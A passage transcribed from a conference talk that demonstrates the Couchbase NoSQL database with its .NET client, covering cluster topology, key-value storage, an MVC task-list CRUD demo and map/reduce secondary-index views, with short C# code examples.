So NoSQL takes the other approach: we need to perform first, and then we'll figure out how to deal with referential integrity and that sort of stuff. And it gets bubbled up to the application in general. This is the other scary part: there's no referential integrity, and no transactions beyond a single document insert, in a NoSQL database. There are a couple of fringe databases — and fringe isn't meant to discount them, they just haven't really caught on — that are actually ACID-compliant NoSQL databases. But generally speaking, the major players do not support ACID properties, so you don't get cross-insert, cross-update transactions. But a lot of this stuff goes away when you think about some of the common use cases. The way you store your data in a relational database is, I insert into five tables because they're normalized, versus one document that contains all my data. So that need to have a transaction boundary across a lot of tables goes away, because you don't have a lot of tables. So again, a lot of these problems are not new problems; they're just solved in a different way. So now, with that said, I'm going to go back to my Hello World example here so we can get a quick view of how I create an instance of the Couchbase client, how I configure it, how I insert a key, and how I read the key — the most basic operations. I think I have internet access that's working right now; this doesn't always work depending on the venue. So I'm going to look for the CouchbaseNetClient package. Does everyone use NuGet? Does anyone not use NuGet in the room? If you haven't used NuGet, it's a package manager for downloading assemblies into your project from inside Visual Studio — basically a reference manager. Oh, yes — let me, I don't need my slides anymore, sorry. Oops, there we go. Can everyone see that okay now? So I'm going to search for the CouchbaseNetClient, which is the official SDK. I'm in my installed packages, let me go to online here. There is a second CouchbaseNetClient listed that is an older version — I don't know why NuGet is keeping that up there twice; I've removed that one as far as I know — but 1.2.6 is the most recent version, and it supports .NET 3.5 and 4.0. So now that I've added that reference, what I get is a reference to three different assemblies. The only dependency that the Couchbase .NET client has is Json.NET, which pretty much everything has a dependency on. Previous versions had a dependency on RestSharp and Hammock, and those are no longer there. Oops, that wasn't right. So you can see this — that's my magnifier in the way, of course — Enyim.Caching. If you've used the memcached client for .NET, you've used Enyim.Caching. This is basically where most of the functionality exists inside of the Couchbase driver, and it's a fork of the original Enyim.Caching. So if you encounter anything out in the wild that's Enyim with Couchbase, there is a particular fork that ships with the Couchbase client, not the actual Enyim.Caching. And then the Couchbase assembly is the other one, which has all of the Couchbase-specific wrappers around the Enyim stuff. So now, once you have those references, you can either configure the client in code or configure it in app.config. I prefer code, and more and more, as I've gone out into the wild, I've seen that people do prefer code configuration. So there's a class called CouchbaseClientConfiguration, and the minimum configuration you need is a bootstrap URL, and I'll explain this in just a second.
So when the CouchBaseClient initializes, what it does, and this is unlike other NoSQL and SQL databases, so what it does is the CouchBaseClient starts up, it spins a thread that goes and listens to a streaming HTTP connection. So basically the cluster, the CouchBase cluster, which is just a bunch of CouchBase nodes that are acting as peers, it connects to one of those nodes which sends down topology updates. So the actual client that's running in your application space knows about the topology of the cluster. So cryptographically it hashes each key that you set for a value, and it sends it to a particular server. So as you add nodes and remove nodes, the client knows how to go directly to the right server. So it maintains a map. There's actually a layer of abstraction in between the client and those keys and how they're mapped, so that's a much more finite because you wouldn't want to have a map with millions and millions of keys potentially on the client. But the client always knows how to go right to the right server that owns the key. So in a CouchBase cluster, the nodes are all peers except one of the nodes owns the key as a master. So the key can be replicated up to three times on other nodes, but it's only on one node as a primary key. I'm not primary key in the obviously SQL sense, but it lives as a master instance of that key and that way CouchBase is consistent. There's different types of consistency levels for no SQL databases. Some databases are called eventually consistent. Has anyone heard that term before? So eventually consistent, kind of the common analogy or the common example is the DNS system. You can update your DNS record, but that DNS record has to propagate to the other nodes in the DNS system before all requests see the most recent update. CouchBase is consistent because when you say get by this key, only one server in the cluster can answer that question versus other databases where Cassandra is eventually consistent. It's tunable. You can force consistency a little bit more. But basically what happens is when you request from an eventually consistent database, you could get a dirty read. You cannot get a dirty read with CouchBase. Hopefully you can, but the.NET SDK doesn't expose the replica reads, which is how you would do that. Sure. So the question was about the failover scenario. And what happens is, so assuming that you've replicated your nodes, replicated to another node, at least two nodes, there's an election of one of those servers to become the new master for that key, and then the server rebalances the keys. So the keys, another thing I'll mention about the keys is they're auto-sharded. Is anyone not familiar with the term sharding? So sharding meaning distributing keys across a number of nodes in your system. So you can shard a SQL table so that you basically spread the rows across many nodes in a cluster. So sharding in MongoDB, for example, was kind of controversial because famously, sorry, Foursquare picked the wrong shard key, kind of overloaded some set of their shards, and that kind of brought Foursquare down. This is many years ago. This isn't like a recent thing, but it kind of was a classic example of why sharding is hard because you can't predict that first names are going to distribute, or last names are going to distribute evenly across your data, versus a cryptographically hashed key in your key value pair. It's pretty safe that you're going to get, if you have a three node cluster and 100 keys, you're going to have about 33 on each node. 
So you can almost guarantee that with Couchbase, if you have n nodes, you're going to have an even distribution of your keys across the n nodes. And you don't have to do any kind of predicting, because it's all done automatically. So that's the bootstrap URL. There's basically a JSON handshake that happens when the client starts up: it gets a JSON response, reads it, gets the next URL to go to for a little more information, and then it goes through that once or twice. Because of that, you don't want to create multiple instances of your Couchbase client. It's not the typical database pattern of using connection equals new connection and starting over — you'd end up re-handshaking every time. So that does mean that you have to have a stateful client. Generally speaking, you keep a static member somewhere that you reuse throughout your application. There's also a socket pool. You can fine-tune how many connections are in the socket pool; by default it'll maintain a set of 10 connections to each node in your cluster. The other thing you need to tell Couchbase is which bucket to connect to. Again, buckets are analogous to databases. There's a default bucket that's installed when you run through the wizard and install Couchbase, and it's just auth-less. The auth model in Couchbase is SASL. It's a simple binary protocol — it's not encrypting anything, it's not user-defined, object-level security. It's just: I have a bucket, and I can either put a password on it or I don't. The username is the name of the bucket, and you can set a password on the bucket. And again, that's not unique to Couchbase. Most NoSQL databases don't have granular security. You may have database-level users, and you may have read-only versus write access, but generally speaking, NoSQL databases do not yet have the same security model that SQL databases do. So now that I have my configuration, I can create a new client. The class is CouchbaseClient, and if you use the parameterless constructor, the client will expect that you have an app.config section defined for Couchbase; or I can just pass my config instance. Now, we'll ignore return values for now and assume everything's going to work, because this is the Hello World example. So I'm going to create a message variable and set it equal to a greeting — did I get that right? Was that right? Close enough. And then I'm going to save that message. The store method is the basic method for doing adds, updates and replaces. There are three types of stores in Couchbase. You can add, which does an insert — it'll fail if the key exists. Replace does an update — it'll fail if the key doesn't exist. Or a set, which is basically like a save: it does an insert if the key doesn't exist, or an update if it does. Generally speaking, I usually just use the set mode. Add is useful if you have things that you want to fail — like creating a user based on an email address where you want that property to be unique; add is a way of guaranteeing that, and you get a status back that says the key exists or something to that effect, so you can check that you're ensuring uniqueness and getting the proper behavior. So I'm going to set the store mode to Set, the key to "message" and the value to the message.
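Roughly, the Hello World being typed here looks like the sketch below. It's written from memory of the 1.2-era client, and the bootstrap URL, bucket name and greeting text are placeholder values rather than what was typed in the demo:

```csharp
using System;
using Couchbase;
using Couchbase.Configuration;
using Enyim.Caching.Memcached;

class HelloCouchbase
{
    static void Main()
    {
        // Minimal configuration: a bootstrap URL and the bucket to connect to.
        var config = new CouchbaseClientConfiguration();
        config.Urls.Add(new Uri("http://localhost:8091/pools")); // assumed local, single-node cluster
        config.Bucket = "default";                               // the bucket created by the install wizard

        // Create the client once; it handshakes with the cluster and learns the topology.
        var client = new CouchbaseClient(config);

        // StoreMode.Set: insert if the key doesn't exist, update if it does.
        var message = "Hello, NDC Oslo!";
        client.Store(StoreMode.Set, "message", message);

        // Read it back by key to prove it worked.
        Console.WriteLine(client.Get<string>("message"));
    }
}
```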
So it's slightly more complicated than a hash table because I have to set the store mode. The other SDKs, the Java, Ruby and everything else, they don't have this idea of a store mode. They have straight methods that are set, replaced and add. This is an artifact of the enum.caching library. I personally would, at some point, would like to see three unique methods there. So then we'll make sure that it worked by getting the value back. So the key is message. So when I set it, I set it with a key. When I get it, I get it with a key. And if all worked, I should get my almost no region hello world. So any questions on the very basics of hello there then? I'm trying. I feel like because I'm reasonably tall and mostly blonde, I've been mistaken for no region quite a bit since I've been here. So now I want to move on to a more interesting example, which will kind of walk through a full crud application, some of the more advanced usages and basically just show how you do code-first development with a no-SQL database. So I think everyone's familiar with the idea of a task app. You have a task. It has a due date, that sort of thing. So I'm going to start out by creating my model. This is the code-first aspect. If you haven't done quote unquote code-first development with entity framework or something, the basic idea is you define a model class. So I'm going to define a model called task. Can you guys, is the font size big enough? My task will have an ID, a description, we'll say notes, we'll give it a is-complete flag and a due date. So very basic model. Any questions or seems pretty straightforward. So now let's go ahead and how many, I shouldn't make any assumptions, how many people have used, not used MVC before? Excellent. It is interesting. Over the past couple of years, I would say it's increasing by about 25% a year the number of people who have gotten exposed to MVC, which is a good thing. So I'm going to create a new controller. I'm going to use the wizards as I go through this demo just so it speeds things up. So I'm going to create an MVC controller with empty read-write actions. And I'm going to call the controller tasks controller. So all I'm doing is creating a very basic CRUD application for managing tasks at this point. So the index is actually going to be the hardest piece that we do. So I'm going to do that last. It's hardest because we haven't seen how to work with secondary indexes yet. So I'm going to start with the create form. And I'm not going to worry about things like validation or that sort of stuff. We're just going to keep this very simple. So I'm going to use the, has anyone, has everyone used the scaffolding in Visual Studio for MVC? That's all the stuff that I'm doing now is part of the scaffolding feature of MVC where you can basically point it out of model and generate forms and things like that in controllers. So I'm going to create a new view under the tasks folder. And we're going to start with create. And then it's a strongly typed view. And you have to compile your application before it actually shows up in that list. So I'm going to call this view create again, strongly typed. So now my task shows up. So now this is going to give me a nice create. If I pick the check box that says to use the create. So I forgot to set the template to create. So what this did for me at this point, in case you haven't seen this before, if I navigate now to task slash create, I have a very simple create form. 
I think there's no validation because I haven't put validation attributes on or anything. So it's just a very basic create form that I can work with from now on. Before I do that, what I want to do is jump over to the couch base. I have, if I wave at my laptop, it detects that and starts to do things. So it may move on its own. I did cheat for the Hello World. So this is the couch base console. So it seemed like only a couple people had seen this. One of the big differentiators between the other NoSQL products and couch bases, couch bases has in my not so unbiased opinion the best admin tools. This is what you get when you install a couch base. It's a web-based, fully exposed API. So everything you see, this is a jQuery app. This isn't like a server doing complicated stuff in the back end. This is a full, restful API, interface to a fully restful API. So if you're ever curious to see what is actually happening, you can just use Firebug or whatever tool to go look at the calls that are being made to generate these graphs and things like that. So when you install it, you get some basic information. So I have a couple of buckets active. You can see ops per second. If I actually had ongoing ops per second, I would get to see the moving graph. You can see if you had any servers down in your cluster. You can drill into the node level. So if I had multiple nodes, so if I wanted to create a couch base, a true cluster, a cluster is just a single node or more nodes. If I wanted to have a multi-node cluster, I click on add server. I add the IP address and then I add the cluster username and password. So when you install the first node, you set a cluster account and that cluster auth is used to then basically bring all the other nodes online in the cluster. If I had in that failover case, it would show up as pending rebalance because basically the keys need to be rebalanced. Data buckets, excuse me. So the beer sample bucket, the beer sample is based on the OpenBearDB. This is the couch base version of what was Northwind. So it's not the most up-to-date database. So if you're a beer drinker, you probably won't find the beer you're looking for in there. But there's some interesting data and we wrote a bunch of sample apps around it, which if there's time at the end, I'll show you quickly the.NET one. Views I'm going to cover in a bit. Cross data center replication. This is a nice feature. You can actually pump data bidirectionally out of couch base and bidirectional, cross data center replication is set up by basically setting up two unidirectional cross data center replication. So if you have, I don't know what the coasts are here, but like in America, if you have an east coast and west coast data center, you can send data one way and have it sent the other way. Or you can just use unidirectional and have a single feed into another data center for backup or disaster recovery. The neat thing about it is it's all done with HTTP. So you can, if you wanted to write your own basically HTTP endpoint for the couch base data, across data center replication, you could. And we've done that to work with Elasticsearch. So if you want to pump data into an Elasticsearch cluster and do full tech search on your documents, you can do that. Does anyone use Nancy, the micro framework for ASP.NET? So it's kind of inspired by Ruby's Sinatra. So it's a very simple handler. 
On blog.couchbase.com you can find a little example where I created a Nancy endpoint which listens to the change feed and then just spits the data out into an XML file as a dummy example. But if you wanted to move data from Couchbase into SQL Server, or into some other back-end processing, that's one way to do it. The log is what it sounds like. Then you can set some settings, like re-adding the sample buckets, whether you want compaction — basically cleaning up the disk — auto failover and that sort of thing. What I want to do now is add a data bucket. So for this to-do application, I'm going to create a new bucket — this is a new database — and when I create it, I'll just give it the name NDC Oslo. Now again, we're fully compatible with memcached, so if you wanted to create a memcached bucket, you can, but there's no persistence. And we do have lots of clients who use Couchbase as a caching layer because of that memcached support — you can actually just drop out your memcached cluster, replace it with a Couchbase cluster, and use memcached buckets. But again, there's no persistence with those, and the performance really isn't going to be better, so you could just create Couchbase buckets and set expirations — there is the ability to add an expiration to a key, so you can have it expire and that sort of thing. You can change the port — I'm sorry, you can't change the port with a standard authenticated bucket: if you create an authenticated bucket, it has to be on port 11211. If you want to have an auth-less bucket, you can do that, just on a different port. So I'm going to leave the password blank for now. I only have a single-node cluster, so there's no reason to enable replicas. Flush is useful if you want to have a test bucket where you just want to flush all the data out of it; when you enable flush, you basically get a one-click "delete all the data" option. So I have that bucket now — you can see it in my bucket list. So now, are there any questions on the UI before I start with the code? So the first thing I want to do is implement the create method. I don't need to do anything for the create GET, but for the create POST, I need to write the insert method, basically. So what I'm going to do is start off by creating a static private field of type CouchbaseClient. And I had previously added the Couchbase client reference through NuGet to this project, because I wasn't sure about the internet access — so that's where that came from, in case you're wondering. And what I'm going to do is, in a static constructor — static constructors, if you're not familiar with them, are guaranteed to execute once, before any instance of the class is created — so in the static constructor, I'm going to create an instance of this CouchbaseClient. I also need to set that configuration like I did before, so var config equals new CouchbaseClientConfiguration. Again, set the URI so it knows where to bootstrap against, and then the bucket name — the NDC Oslo bucket I just created. And then I pass that config to the client. So now I have a static field that I can use across all my methods here. And that was, again, just what we saw with the Hello World stuff. So now in Create, what I'm going to do is, let's see — I'm going to change this: instead of taking a forms collection, I'm just going to have it auto-bind to the Task, using the bi-directional data binding that comes with MVC out of the box.
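In code, that static client setup looks roughly like this — the URL and bucket name here are placeholders for whatever your cluster actually uses:

```csharp
using System;
using System.Web.Mvc;
using Couchbase;
using Couchbase.Configuration;

public class TasksController : Controller
{
    // One client for the whole application -- a new client per request
    // would redo the bootstrap handshake every time.
    private static readonly CouchbaseClient _client;

    static TasksController()
    {
        var config = new CouchbaseClientConfiguration();
        config.Urls.Add(new Uri("http://localhost:8091/pools")); // bootstrap URI (placeholder)
        config.Bucket = "NDCOslo";                                // the bucket created in the console (name assumed)
        _client = new CouchbaseClient(config);
    }

    // ...actions go here...
}
```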
So now that I have a task — actually, first things first: we're a key value store, right? So I need to consider what the key is going to be. A lot of times, predictable keys are useful, because you can do ordering on keys and things like that with views, which we'll see in just a few minutes. But the important thing is that you pick a key that makes sense for your scenario. Now, there's no way to not have a key — there's no auto key, first of all. There's no "I do an insert and I don't have a key, so it automatically assigns one." You have to pick a key. Generally speaking, if I were doing a to-do app like the one I'm demoing now, I would just use a GUID or some unique identifier; there's not really any value in having a descriptive key for a task. If someone has a better reason to do that, I'm open to it, but I think the best way to do this is just Guid.NewGuid().ToString(). All keys in Couchbase are strings — UTF-8 strings. Oops, not result — key. So now I'm going to call the store method, but I'm going to call a different store method. One of the interesting legacy items I had to deal with when I first took over the Couchbase client was that it was, again, a caching library under the covers — the core of the library was a caching library. And in a caching library, arguably you don't want exceptions thrown if something is a cache miss or a cache write fail: you either got it out of cache or you didn't, and your application responds appropriately. So what was happening in the internals of the client is that every single exception was being swallowed, and booleans were being bubbled up to the top. So if you called Store and it failed, you got a false. Now, if you're storing transactional financial data or something, you probably don't want "false" as the only explanation of why something failed. So there's this sort of parallel API: every Store, Get or Remove method has an associated Execute... method. ExecuteStore returns more detail than Store: Store returns a boolean, ExecuteStore returns an operation result, and I'll show you in just a second what that contains. So we'll do store mode — we're doing a create, so I'm going to do StoreMode.Add. The key, again, is that GUID, and the thing we're going to save is the task. So then there's that result object. You can do things like check the success of the result. A common pattern is, if it's not successful, you can check things like the message, the status code, or the exception. If there was an exception way down in the socket layer, it basically gets wrapped up and passed up through this exception object. So there's no exception that's thrown, but you can check to see if the exception is not null, and then throw that exception. I won't go through that whole exercise here, but just so you know, there is a bunch of detail about what went wrong or didn't go wrong inside of that result. So let me reclaim some space back here. Now on the next line, I'm just going to redirect to the details — we'll work our way along: we'll create it, and we'll show the result in the details. Oops. So RedirectToAction, Details, and I want to redirect with the ID set to the value of the key. Oops. Return. So there are a couple of issues I have to fix that I just know about from doing this a bunch of times. You have to save serializable objects through the client — if you're saving a class, it has to be serializable, because it gets serialized and saved.
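Pulled together, the Create action being typed out is roughly the following sketch. Error handling is kept minimal, and the ModelState fallback is my own addition rather than something shown in the demo:

```csharp
// Inside TasksController (StoreMode comes from Enyim.Caching.Memcached):
[HttpPost]
public ActionResult Create(Task task)
{
    // Pick the key ourselves -- there's no auto-generated key in Couchbase.
    var key = Guid.NewGuid().ToString();

    // ExecuteStore returns a rich result instead of just a bool.
    var result = _client.ExecuteStore(StoreMode.Add, key, task);

    if (!result.Success)
    {
        if (result.Exception != null)
        {
            throw result.Exception;                   // e.g. a socket-level failure bubbled up
        }
        ModelState.AddModelError("", result.Message); // non-exception failure (key exists, etc.)
        return View(task);
    }

    return RedirectToAction("Details", new { id = key });
}
```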
The other thing to fix is that because we're dealing with string IDs — with an MVC template you get int IDs — on Edit and on Details, those int IDs have to be changed to string IDs, or the routes don't match. And since we're going to Details, let me just find that. Okay, so now let me compile that. So now — oops, where did my... this should still be good. So I'm going to create a very simple task here. And there's my gesture thing popping up, because it sees me waving or something. It's not complete; we'll give it a due date of 6/14/2013. Apologies. Okay, so this I expected, right? I haven't created the Details view yet, but no exception was thrown, and here's my GUID. I'm going to go through Details first, and then I'll show you what's actually in the database. Are there any questions on Create so far? Pretty straightforward: I have a key, I have an object that's serializable, I save it — there's not much more to it than that. Now in Details, I'm just going to get by key. The key was passed here in the query string, so I have it available to me, and it's coming in through the route as this string ID. So, var result equals client.ExecuteGet — and I can use the generic ExecuteGet, which will automatically cast it to a Task on the way out — and the key is the ID, and I just pass that. So the ExecuteGet method returns an IGetOperationResult, which has a Value property — the thing I saved — and it also has the Exception property, the Success property and all those things, so it wraps all that stuff. The plain Get method returns either null or the object, with no detail about what went wrong. So now I'm going to create the Details view; I'll name it Details, with a scaffolding template of Details. So now if I compile and refresh past this YSOD, I should get — there we go, now I have the description showing up. So, pretty straightforward get and set; it's really just what we've seen so far in our console app. But what I want to show you now is what's actually in the database. You can see in NDC Oslo we have one op per second, so we're doing pretty well there. If I click on Documents, you can see over here that I have an item count of one, and if I click in here, you can see here's that document, and here's the key. This is a little strange, though. I've said before that Couchbase is a document-oriented database — that doesn't really look like a document. Anyone have an idea of what that is? It's a Base64-encoded version of the binary object. I didn't store JSON. There's a big difference here between Couchbase and MongoDB: MongoDB forces everything into BSON, binary JSON; Couchbase does not. Couchbase stores binary objects, and it treats JSON as a specially recognized kind of object, you can think of it that way. On the server, if you store valid JSON, the server can do stuff with that JSON document. The client has to make a decision as to whether it's going to pass JSON or not, and to make that easier, you can use some extension methods. We've thought a lot about whether we should force people to store JSON. We have a legacy of a lot of binary data being stored, so we couldn't just release 2.0 and say, oh, all that data that you stored as binary now has to be JSON. Plus, some people don't want to store JSON — they want to store objects in their binary form and retrieve them quickly. People are storing images, people are storing all sorts of different things in Couchbase clusters.
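Back in the controller, the Details action just typed out is essentially a get by key — roughly this, where the 404 handling is my own shorthand for the demo's "just show it" approach:

```csharp
// Inside TasksController:
public ActionResult Details(string id)
{
    // ExecuteGet<T> deserializes the stored object back into a Task and
    // wraps it with Success/Exception/StatusCode details.
    var result = _client.ExecuteGet<Task>(id);

    if (!result.Success)
    {
        return HttpNotFound(); // assumed handling; the plain Get would just return null here
    }

    return View(result.Value);
}
```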
So, back to the storage format: there are lots of use cases for not storing JSON. JSON is very expensive — we heard from a former CTO of Zynga that they were spending 30% of their CPU cycles just doing JSON serialization and deserialization. That's not insignificant, obviously. I do have some extension methods, though. Under Couchbase.Extensions, you can basically take any of the Execute methods and tack the word Json onto the end. So if I say ExecuteGetJson or ExecuteStoreJson, and I compile that and go back to my form, we can see something else happen — create a task 2. So everything worked as it did before, but now if I go back to my documents, you'll see that I have JSON stored here. So I have something useful as far as the server is concerned: a JSON document against which I can write a secondary index. So I'm just going to store a couple of these tasks quickly and change some dates here. And we'll create a task 4, we'll call this. Okay. So now over here, I've basically just created some more data to demonstrate the list, which is the next thing we'll do. Before I jump into the list, which is going to switch to secondary indexing, does anyone have any questions? What happens if you go back to the document with the JSON — the old one is still non-JSON in there? Yeah — oh, yeah, that'll break. If I took this... I apologize that I didn't bring music. So if I tried to drop this in, I'll get a deserialization problem. Well, the model doesn't have an ID, so the form is actually breaking, but it won't deserialize, because it's not a string. Yeah, backwards compatibility — there are a bunch of challenges with backwards compatibility, because you can store a document that doesn't deserialize properly into your class, and you can have binary data that's not going to store properly. There are solutions for all that stuff, whether it's versioning your documents, or you can create something called a custom transcoder. It's pluggable, so you can basically tell Couchbase, every time you deserialize something, if it's of some particular format, then deserialize it that way — binary versus JSON. You can look up transcoders and see some videos that we did on how to do some of that sort of special mapping. My question for you would be, then — so everyone knows how to work with key value stores — how would you get a list of all the tasks with a key value store? Can anyone imagine how you might have done this? If all you had was this key value API, how would you go find all the keys? Kind of a trick question. Yeah, there's definitely... and I'll show you how to do it without — this is not done using the key value API. So with Couchbase 1.8, which was a pure key value store, the approach people took was to store keys in another key. So if you wanted to say "all of my tasks": when I create a task, I also insert its key into a tasks list. You're basically storing references in other keys and pulling them all back. There were some other approaches — like, if you had sequential keys, you could do a bunch of gets until one failed, by incrementing up by one, and then the one that failed told you where the top was, and now grab them all. None of it's pretty — yeah, everyone kind of realizes that. Secondary indexing really is much prettier, much nicer. So let me jump right into that.
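(Before moving on to views: the JSON variants mentioned above are literally the Execute methods with Json tacked on — something like this, as I remember the Couchbase.Extensions API, so treat the exact signatures as approximate.)

```csharp
using Couchbase.Extensions; // brings in the *Json extension methods

// Store the task as a JSON document the server can index...
var storeResult = _client.ExecuteStoreJson(StoreMode.Add, key, task);

// ...and read it back, deserializing the JSON into a Task.
var getResult = _client.ExecuteGetJson<Task>(key);
var saved = getResult.Value;
```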
The way secondary indexing is done is with something called a view. Has anyone heard the term MapReduce before? If you've used LINQ, you've probably had some sort of map/reduce exposure. The very basic idea: you have some collection of things — in this case, all of the documents — and you have a map function. The map function is going to be applied, in a big foreach loop, to each of your documents. The input to the map function is the current document; the output is a key value pair. The key is something you want to search on, something you want to create an index on. So it's basically just transforming a set of data into a projection, which is a key value pair — and you can do that with a .Where and a .Select in LINQ. So if you want to think of a LINQ analogy, the map function is kind of like the .Where, plus the application of a .Select to shape it into a key value pair. Let me show you in JavaScript what that means, though. We have this idea of development versus production views. Development views work by basically taking a small set of your production data. Say you want to create an index on a million records — you don't want to start with all one million records; you want to start with a finite subset of that. So development views are deterministic: they grab a small subset of your data and mark it as usable in a development view. It's a useful way not to break things. Design documents are namespaces for your index definitions. So I'm creating a design document called tasks, in this case. The dev underscore is what makes it that deterministic dev — I'm sorry, design document. And the view is just going to be called all, because I want to get all tasks. Once I create that, I click in and I have this editor, where I have a map function, which is just a JavaScript function that by default creates an index on the ID. Now, the only reason you would ever create an index on the ID — so, here the ID is the key. One of the confusing things to get your head around is that in the context of key value CRUD operations, the key is the key in the key value operation; in the context of a view, the key is whatever you emit — by default the meta.id — because views actually create a new key value pair, which is the index. So when I'm talking about keys in terms of views, I'm talking about the thing I'm indexing: I'm creating an index on a property, and that property is called a key. So if I run this, you see I just get all documents, along with the index created on their ID. Now, this is the primary key, so this is just like creating a secondary index on a primary index. You wouldn't do that, obviously — unless you want to do a range query on your primary key. You can't do range queries on keys without creating an index on them; you can't say "give me all the keys that start with A and go to Z" if you don't have that secondary index. But what I want here is really just null — I want all tasks, I don't care about the key, I just want an index that will return all of the data for a set of tasks. So let me show you how this actually works, by showing you the JSON that comes back to the SDK. When you create an index, you create a set of rows, where each row is a triplet. The triplet consists of the original ID — the key from the key value insert — then the key, meaning the thing you're indexing. So if I had a first name or last name, that would show up in the key.
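If the LINQ analogy helps, the map step is roughly a Where plus a Select projecting each document into the thing you want indexed, keeping the document id alongside. This is purely illustrative C# — not how the server actually runs it — and the document shape is made up:

```csharp
using System.Collections.Generic;
using System.Linq;

// Made-up document shape, just for the analogy.
class PersonDoc { public string Id; public string LastName; }

static class MapAnalogy
{
    static void Demo(List<PersonDoc> allDocuments)
    {
        var index = allDocuments
            .Where(doc => doc.LastName != null)                 // the guard you'd put inside the map function
            .Select(doc => new { doc.Id, Key = doc.LastName })  // like emit(doc.lastName, null), with the doc id carried along
            .ToList();
    }
}
```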
And the value — the third part of that triplet — is potentially a projection over which I'm going to do aggregation, which I probably don't have time to get into today. But if I were doing, say, a count of tags, or a sum of tags, or a sum of karma points, I might project that into the value and then do aggregation on it. The important thing is that with every row in an index — and this is just a standard B+ tree database index — with every row I have the ID of the original document. What I generally do with that ID is go back to the original document in memory and pull it out, because Couchbase has persistence. So views are basically indexes that are stored on disk and read off of disk, but you go back through the memcached API for the document itself, because your document is 99% likely to be in memory. All of those documents are resident in memory if you have enough memory, so any most-recently-used document will be there. So it's a different access pattern than your typical database, where you wouldn't generally create an index just to get the primary key and go back to the original row. But that's what you do in Couchbase: you create an index to get the ID, to go back to memory. It's just a different sort of workflow, but it's abstracted away from you in the client. I'll show you that now. So let me do the all query here, and then I'm going to change it to something that will hopefully illustrate what that key and value are a little more easily. So now if I go back to the client — like, what? That's going to be an issue I'll show you in just a second; that was a good catch. So, the Index method — where is it? What I want to do is call the client's GetView method. There's a generic GetView which will convert your documents into instances of T. My design document was named tasks, and my view name was all, and there's a third argument that says go pull the document out of memory instead of trying to deserialize the index's value. And then I'm going to pass that to the Index view — again, we have a name collision between view and view here. So I'm going to create an MVC view called Index with the List scaffolding. One more quick thing I have to do over here: I have to promote this from dev to production. So when I publish, now you can see I have a production view — basically it just took the dev underscore off the name, so it will go against my entire dataset. So now if I go back to the list — oops. So this is part of the problem that a couple of people have mentioned: I have this binary thing sitting in there, and I can't convert that. My view just emitted everything; there's no way for me to know that a document is a task. We don't have a concept of a collection or some kind of container for documents — in Couchbase there's a bucket, and the bucket just contains documents. So the convention is to include a type on your documents. What I usually do is define a base class that forces you to implement an abstract type property; here we'll just return "task". And this demonstrates the schema-less idea: I can just go create new documents with a new schema, quote-unquote, because each document has an implicit schema. So if I go back — let me create just a couple of quick documents here. Let me make this... Now if I go back to my view, I can check — I'll just pull up a random one somewhere in here. So now you can see — does everyone see this type equals task? Now, in my map function, I can emit only tasks. Anything you can do in JavaScript, you can do — oops, you can't edit in production.
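Back in the controller, the Index action wired up to that view is roughly this. The design document and view names are the ones created above, and the third argument is the "go get the original document by id" flag:

```csharp
// Inside TasksController:
public ActionResult Index()
{
    // Walk the "all" view in the "tasks" design document and pull each
    // original document back through the key/value API.
    var tasks = _client.GetView<Task>("tasks", "all", true);
    return View(tasks);
}
```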
To edit, you have to go back to the dev view. And anything you can do in JavaScript, you can do here — you could theoretically embed jQuery in here. I've basically taken a base64 decoder, put it in here, and pulled out the original strings that had been base64 encoded, as a demo; I would never recommend doing that. So now I can check: if doc.type equals task, then emit it. If I save that and show the results, now you see that I'm only getting the two records that I created. So I've given a taxonomy to my documents, even though they don't have one. So I'm republishing to production, and now when I go back to the list, hopefully everything should work — now you see that I have my documents. But I want to show one last thing, and then I'll take questions. So if I create a new document and I give it — if we look back at my list, you see I have 1/14, 3/14 — but let's say I do 12/12/2012. So I'm intentionally creating this one in the past. A couple of things to demonstrate. These views are eventually consistent: basically, when you create the view, you create an index on the documents that exist at that point. There are different tuning settings, so you can force a view to be not eventually consistent. I don't have time to demo that, but basically you can set a flag that says: on a write, make sure it goes to disk; on the view, make sure that you update the index — which is incremental, it's not going to reindex all of your documents, just anything that's changed — and that gives you a fully consistent read. So when I refresh, it shows up; it just took a second for the indexer to kick off and update. Basically, requesting a view triggers the next indexing of your view, but you can tell it to index first and then give you a result. But notice that these are not quite in order: 12/12/2012 should be the first task in my list. The way I solve that problem is to create an index on the date. So if I go back here — oops — we're going to add a new view, and we're going to call it by date. This is going to be very similar to my all view, so I'm just going to copy this. Let me make that a little bigger. Now, in addition to checking that the type is a task, I want to make sure — because we're schema-less, I want some protection on my index creation — I want to make sure that the doc has a due date, because I don't want to index a document by due date if it doesn't have one, and I can just use JavaScript's implicit null check there. So now I'm emitting the due date. You can think of all these map functions, if you want a SQL analogy, as CREATE INDEX: all this is doing is creating indexes on properties inside of documents. So if I show the results, you can see that now I'm ordering correctly by date-time. Let me publish this to production. Then if I come back here and change my method to use the by date view, when I refresh this, we should see it ordered by date. So now 12/12/2012 comes first — which, coincidentally, is the date that Couchbase 2.0 was launched. One other thing I'll mention that's worth knowing about is out on github.com: there's a much more complete example of using Couchbase with MVC. It runs against the beer sample database, and I've extensively commented it — I wrote something like a 40-page tutorial on it. If you picked up the NDC developer book, I wrote an article that's basically "here's the beer sample database, here's the view that gets you data out of it," so that's in there. But it has everything from the basic CRUD forms that we just looked at.
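(For completeness, querying that date view from the .NET client — and telling it to index first, the consistency knob just mentioned — looks roughly like this. I'm assuming the view was named by_date, and the fluent Stale call is how I remember the 1.2 client exposing the setting.)

```csharp
// Inside TasksController:
public ActionResult Index()
{
    var tasks = _client.GetView<Task>("tasks", "by_date", true)
                       .Stale(StaleMode.False); // update the (incremental) index before returning rows
    return View(tasks);
}
```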
If you wanted to see, it doesn't look like we have any. If you wanted to see how to do aggregation, this is all in there. If you wanted to see, again, this is github.com slash couchbase labs. And there's also geospatial stuff. So if you wanted to see how to do geospatial indexing, this app is kind of goes through some best practices too. So has anyone, is anyone familiar with the repository pattern? So I implemented a repository of T. I'm at zero here. So there's a repository of T and it's fully commented. You can see how to create subclasses out of a base repository class, which will then give you access to all of your handling of errors and how to reuse a lot of this code. There's also one last thing I'll mention. That JavaScript stuff that I was showing you, you can actually not do that. And instead use a framework I wrote called couchbase model views, which you decorate your plain old C sharp objects with attributes and it will auto generate the views for you. So if you wanted to create that all view, a by name query or that sort of stuff, it will just automatically generate that. So I know that was a lot of information, but are there any questions? In this framework? Oh, sure. So the sorting, it's ascending by default. You can set descending to false. There's a parameter. So all the views, the API has things like descending. You can set stale as the parameter to turn off. You can do an exact query by passing in a key. So if you wanted to find the user with the last name of X. All in the query. Yep. Question? So multiple buckets, I would generally say there are resources associated with each bucket and there are limitations where you can't cross buckets to get data. So if you have a document in one and you want to 